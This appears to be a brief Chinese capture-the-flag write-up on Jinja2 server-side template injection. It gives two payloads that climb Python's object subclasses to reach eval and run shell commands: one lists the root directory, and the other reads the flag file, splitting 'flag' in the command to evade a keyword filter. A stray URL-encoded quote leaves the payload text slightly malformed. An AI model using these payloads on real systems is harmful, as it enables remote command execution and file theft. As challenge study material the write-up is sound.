在括号内输入9*9可得结果 81
模板注入可参考
https://blog.csdn.net/xia739635297/article/details/104229582
{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
{%endif%}
{% endfor %}
在cat flag会遇到过滤,测试可知过滤flag,命令执行时绕过即可
{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /fla''g').read()")}}
{%endif%}
{% endfor %}